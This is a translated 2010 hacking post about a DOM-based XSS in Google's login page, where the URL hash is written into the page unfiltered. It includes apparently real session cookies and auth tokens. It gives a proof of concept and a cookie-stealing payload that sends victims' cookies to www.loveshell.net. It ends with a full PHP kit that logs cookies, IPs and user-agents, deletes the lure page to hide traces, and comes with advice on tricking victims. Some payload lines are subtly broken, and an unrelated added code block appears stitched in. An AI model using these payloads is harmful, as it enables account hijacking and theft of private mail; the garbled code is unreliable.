Simple HTML injection leads to a Gmail 0day - Vulnerability Warning - Black Bar Safety Net

2010-01-08T00:00:00
ID MYHACK58:62201025857
Type myhack58
Reporter Anonymous
Modified 2010-01-08T00:00:00

Description

/Very good article, oh/ I. Analysis of Google.com service authentication

XSS and authentication are inseparable: the way authentication works may decide how an XSS can be used. My last analysis was too sloppy and even turned out to be wrong, so this time I will analyze the Gmail login flow in detail and keep it for future reference. a) Log in normally, go to the home page, then enter http://mail.google.com/mail/ and start capturing requests. Treat the requests simply as a sequence of cookie exchanges:

1 http://mail.google.com/mail/

2 https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2

3 http://mail.google.com/mail/?ui=html&zy=l&pli=1&auth=DQAAAHoAAABQSQc9YLJ0OVWvxie35DyUk2imfy2kmgvggtzspa0lf6wdxn9te2b8eterw3pjh0ugxf5ndmunowqhfqa9w42iat7vj5q_MS4wnrVlEl8qNA__13oQbLk6slnwRH7xE_g0dAHv6GTTLdnpH2Sz_944H50_kkiySYkJxbEwizrJfg&gausr=xssshell%40gmail.com

4 http://mail.google.com/mail/?auth=DQAAAHoAAABQSQc9YLJ0OVWvxie35DyUk2iMFY2kMgVggTzsPa0lF6wDXN9Te2B8Eterw3Pjh0ugXF5NdmuNowQHFQa9w42IaT7vj5Q_MS4wnrVlEl8qNA__13oQbLk6slnwRH7xE_g0dAHv6GTTLdnpH2Sz_944H50_kkiySYkJxbEwizrJfg&gausr=xssshell%40gmail.com&zx=15tl76j8t6fkm

The steps above complete the Gmail login, so what decides whether you are logged in? The only thing that can vary in these requests is the cookies that are sent, and we know Google uses cookie authentication: you may have logged in N days ago and still go straight into the service. Analysis of the requests above:

1 Login request to mail. Cookie: __utmx=173272373.; __utmz=173272373.1193966736.8.2.utmccn=(referral)|utmcsr=google.cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; __utmb=173272373; __utmc=173272373; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1165197373:LM=1191830448:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; adsenseReferralClickId=; adsenseReferralSourceId=; adsenseReferralSubId=; AccountsUserLocale=en; TZ=-480; GMAIL_RTT=360; SID=DQ-pH2NuR3Fe1uLZBWvm8Uu02Rz-yxpRW8EETkhatuj5c0_49VAEZhz2Bil4iteymiqgcfpmia6ywxkstmokb4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ

2 Redirect to the https:// authentication request. Cookie: __utmz=173272373.1193966736.8.2.utmccn=(referral)|utmcsr=google.cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; GoogleAccountsLocale_session=en; GALX=-9v3itptNkM; __utmx=173272373.; __utmb=173272373; __utmc=173272373; __utma=173272373.186433766.1188982067.1190878925.1191830423.5; __utmz=173272373.1191134563.4.2.utmccn=(referral)|utmcsr=google.com/utmcct=//utmcmd=referral; LSID=ig.US|s.CN:DQAAAHoAAAAhRFp2nnIbqg0aVlV6Uqz2dujgmuqjr5ktpx6ejootmgko8_x0k0netkvlm_uwifecgc6sl5suiw1zguxghgniwisvjohf_w4uqwvuf5dywei8g; GAUSR=xssshell@gmail.com; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1165197373:LM=1191830448:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; adsenseReferralClickId=; adsenseReferralSourceId=; adsenseReferralSubId=; AccountsUserLocale=en; TZ=-480; GMAIL_RTT=360; SID=DQAAAHYAAAB_DQ-pH2NuR3Fe1uLZBWvm8Uu02Rz-yxpRW8EETkhatuj5c0_49VAiAkby3kca96qsp4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ

3 Authentication succeeded; return to the requested service. Cookie: __utmx=173272373.; __utmz=173272373.1193966736.8.2.utmccn=(referral)|utmcsr=google.cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; __utmb=173272373; __utmc=173272373; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1165197373:LM=1191830448:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; adsenseReferralClickId=; adsenseReferralSourceId=; adsenseReferralSubId=; AccountsUserLocale=en; TZ=-480; GMAIL_RTT=360; SID=DQ-pH2NuR3Fe1uLZBWvm8Uu02Rz-yxpRW8EETkhatuj5c0_49VAEZhz2Bil4iteymiqgcfpmia6ywxkstmokb4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ Note that this hardly differs from 1, but this time the response carries Set-Cookie content; go back one step and it becomes clear why.

4 Start normal use of the service. Cookie: __utmx=173272373.; __utmz=173272373.1193966736.8.2.utmccn=(referral)|utmcsr=google.cn|utmcct=/accounts/Logout2|utmcmd=referral; __utma=173272373.186433766.1188982067.1193907906.1193966736.8; __utmb=173272373; __utmc=173272373; gmailchat=aaaaaaaa@gmail.com/807215; S=gmail=cfWQ6LE0MZbiJm25LDZxlg:gmail_yj=Z7vHwAIXkryktlbItejqXg:gmproxy=OPFmILmMa5U:gmproxy_yj=u-33CWWWIPU:gmproxy_yj_sub=9l7cuWTN924; GX=DQAAAHgAVTV8SGetElPbTPX1c7FbBKTFkok35whihdnp72o29rmgf-OShTX8QWHmxvlSsf6rvujTywXjs-_NO_2YwL3mkkzlmUA1P-M4C-gp3Qv7N84c9TU4ONw; GMAIL_AT=2203afa7965c02d0-115fe01fa2f; GBE=bf-i; PREF=ID=cc691da201a59bfd:LD=en:NW=1:CR=2:TM=1165197373:LM=1191830448:GM=1:IG=3:S=HnXNhPCFf7xdHLsL; TZ=-480; GMAIL_RTT=360; SID=DQAAAHYAAAB_DQ-pH28Uu02Rz-yxpRW8EETkhatuj5c0_49VAEZhz2BanYhiezv16ywxkstmokby3kca96qsp4l8qk3nbborh7wq5dcb-BRpx28WYhF3RwE1gZaU98JlV52LgElsP8egqfoaj-VCPvQ; GMAIL_HELP=hosted:0

At this point we need a good understanding of the protocol and of cookies. A cookie carries a domain and a path. In the second step above, the cookies we sent are those belonging to https://www.google.com/; these cookies are completely invisible to http://www.google.com. After the cookie authentication succeeds, the authentication server generates an auth value, passes it in the URL to http://mail.google.com, and http://mail.google.com uses this auth to generate its own cookies. Google of course sets their path under /mail/, so they cannot be read from ordinary paths.
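As an added illustration (not part of the original article), a small JavaScript model of the RFC 6265 cookie-scoping rules (domain, path and Secure attribute) that explain why the captures above show LSID only on the https accounts request and GX only under /mail/. The cookie attributes in JAR are assumptions for illustration, not values read from the captures.

```javascript
// Added example: model of the cookie-scoping rules behind the captures above.
// Cookie attributes below are assumed for illustration (RFC 6265 semantics).

function parseUrl(url) {
  const m = /^(https?):\/\/([^\/]+)(\/[^?#]*)?/.exec(url);
  if (!m) throw new Error('unsupported URL: ' + url);
  return { scheme: m[1], host: m[2].toLowerCase(), path: m[3] || '/' };
}

// RFC 6265 5.1.3: the request host equals the cookie domain or ends with "." + domain.
function domainMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// RFC 6265 5.1.4 path-match: identical, or a prefix ending at a "/" boundary.
function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || reqPath[cookiePath.length] === '/';
}

// Names of the cookies a conforming client would attach to a request for `url`.
// A Secure cookie is never sent over plain http, even to the same host.
function cookiesSentTo(jar, url) {
  const u = parseUrl(url);
  return jar
    .filter(c => domainMatches(u.host, c.domain))
    .filter(c => pathMatches(u.path, c.path))
    .filter(c => !c.secure || u.scheme === 'https')
    .map(c => c.name);
}

// Constructed jar modelled on the captures (values omitted, attributes assumed):
//  - SID is a plain cookie for the whole google.com domain,
//  - LSID is the Secure accounts cookie of the https login step,
//  - GX is the mail cookie scoped to mail.google.com under /mail.
const JAR = [
  { name: 'SID',  domain: 'google.com',      path: '/',         secure: false },
  { name: 'LSID', domain: 'www.google.com',  path: '/accounts', secure: true  },
  { name: 'GX',   domain: 'mail.google.com', path: '/mail',     secure: false },
];
```

With this jar, the https ServiceLogin request receives SID and LSID, the same URL over http receives only SID, and http://mail.google.com/mail/ receives SID and GX while http://mail.google.com/ gets SID alone.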

Here we have reason to be very pessimistic. Yes, if you want to use XSS to get into Gmail, there are only a few entry points:

1 An XSS on the https server, to obtain the authentication cookie; with this stolen cookie you can enter any service.

2 An XSS under http://www.google.com/mail/ or http://mail.google.com/mail/, to obtain the mail authentication information directly; this does not affect the other services.

II. Our dish?

This is the theoretical foundation of our Gmail 0day; now we only need an XSS point that satisfies condition 1 or 2. While casually viewing a source file I found this XSS: the injection appears in the Google login page, which very aptly satisfies condition 1. If we get the cookie, in theory we can enter any Google service, oh, really lucky, huh. Opening the mail login page gives the following address:

https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2

This address has many parameters, and many of them appear in the page, but Google still takes security seriously: the incoming parameters are either filtered by the program or rejected outright as an illegal request. The HTML injection I mentioned last time, however, is not affected by the server side at all, because the problem occurs on the client and the server never sees it. So where is the HTML injection? Viewing the page source you can see the following function definition:

<script>
function utmx_section(){}
(function(){
  var k='3068818340',d=document,l=d.location,c=d.cookie;
  function f(n){
    if(c){
      var i=c.indexOf(n+'=');
      if(i>-1){
        var j=c.indexOf(';',i);
        return c.substring(i+n.length+1,j<0?c.length:j)
      }
    }
  }
  var x=f('__utmx'),xx=f('__utmxx'),h=l.hash,
      t=h.length>1||!xx||!xx.indexOf(k+':bypasscache');
  d.write('<sc'+'ript src="'+'http'+(l.protocol=='https:'?'s://ssl':'://www')+'.google-analytics.com'
    +'/siteopt.js?utmxkey='+k+'&utmx='+(x?x:'')+'&utmxx='+(xx?xx:'')
    +(t?'&amp;utmxtime='+new Date().valueOf():'')
    +(h?'&amp;utmxhash='+h.substr(1):'')
    +'" type="text/javascript" charset="utf-8"></sc'+'ript>')
})();
</script>
<script>utmx_section("title")</script>

This looks like Google's statistics code; what it is used for we will not discuss. Look at the code itself: it first defines a function and then calls it, and inside that function there is exactly this line:

l=d.location

This single statement represents user input. Now look at what is done with l:

h=l.hash

The hash is the part of the URL after #, and it is not visible to the server when the request is submitted. And then? Then comes the d.write operation; d is the document object defined at the beginning, and here it rewrites the page with parameters that include the hash content, without any filtering, oh. This is a typical HTML injection vulnerability. Next comes exploitation, which is also very simple: the content after # in the URL is the hash, and as long as the syntax stays correct you can XSS. I provide a simple PoC here:

https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#"></script><script>alert('xss')</script>&1-=1

You can see the popup produced by the XSS, which proves that we can run code.

III. Trojan

Above we can execute code, but there is still a small problem with exploitation. The conventional way to use a URL XSS is to embed it in an iframe, but this is an https page, and when testing I found that in IE the cookie information inside the embedded iframe is taken away; it seems I later learned that http does not work either, while Firefox behaves normally. So can we not perform some operation on the mail directly? When testing I found that even under the same domain name an https page cannot operate on an http page, and when https contains http content a prompt appears, which raises the difficulty of exploitation. But since getting the cookie means getting everything, as long as the cookie can be obtained that is enough, and a window.location jump is not affected by the domain name! The Trojan is as follows:

<script>
foourl='';
window.location='https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#"></sc'+'ript><scr'+'ipt>eval(unescape("url%3Ddocument.location.href%3Bcookie%3D.%3Bc%3D%27http%3A//www.loveshell.net/1.php%3Fc%3D%27+cookies+%27%26u%3D%27+url%3Bdocument.location.hash%3D%27%27%3Bdocument.location%3Dc%3B"))</scr'+'ipt>';
</script>

The code in the middle does the following: it redirects to www.loveshell.net with the current cookie as a parameter, and at that 1.php we save the cookie and the other information we need, then jump a second time to another site to do the covering-up. Afterwards we can use the obtained cookie to enter someone else's mailbox. The whole exploitation process looks like this: we carefully construct an address, for example http://www.loveshell.net/contact.html, which contains our exp, then trick someone into clicking that address (this may require concocting a tempting story and finding someone who is not too security-sensitive); after they open it we destroy the forged address and anything else suspicious, and then we can use the obtained cookie to enter their mailbox. This XSS is rather hard to defend against because the entire process runs on the client; only improving code security at the root can avoid this kind of problem, and Google's security authentication model should also be questioned. Until now Google has not patched the vulnerability, oh. Just for fun :)

The Trojan consists of several files, as follows:

<?php
// Configuration file, do not rename
// Tricking someone into opening contact.php is enough
// contact.php can be renamed; image.php and config.php cannot
$sitepath='http://127.0.0.1/test/gmail/'; // put image.php, config.php and contact.php in one directory; this is that directory's URL, remember the trailing /
$gourl='http://www.163.com/'; // where to redirect after the cookie has been stolen
?>

<?
// Exploit file
include 'config.php';
?>
<script>
foourl='';
window.status='';
window.location='https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#"></sc'+'ript><scr'+'ipt>eval(unescape("url%3Ddocument.location.href%3Bcookie%3Ddocument.cookie%3Bc%3D%27<?php echo $sitepath?>image.php%3Fc%3D%27+cookies+%27%26u%3D%27+url%3Bdocument.location.hash%3D%27%27%3Bdocument.location%3Dc%3B"))</scr'+'ipt>';
</script>

<?
// Cookie-collection file
include 'config.php';
?>
<?php
if(!empty($_GET['c']))
{
    $file=fopen("fuckgoogle.php","a+");
    fputs($file,"<?php die();?>"."||| Cookie:$_GET[c]|||user-agent:$_SERVER[HTTP_USER_AGENT]|||REMOTE_ADDR:$_SERVER[REMOTE_ADDR]|||REFERER:$_SERVER[HTTP_REFERER]|||the url:$_GET[u]\r\n");
    fclose($file);
}
else {
    $file=fopen("fuckgoogle.txt","a+");
    fputs($file,"<?php die();?>"."||| Cookie:$_GET[c]|||user-agent:$_SERVER[HTTP_USER_AGENT]|||REMOTE_ADDR:$_SERVER[REMOTE_ADDR]|||REFERER:$_SERVER[HTTP_REFERER]|||the url:$_GET[u]\r\n");
    fclose($file);
}
@unlink('contact.php');
?>
<script>
document.location='<?php echo $gourl?>';
</script>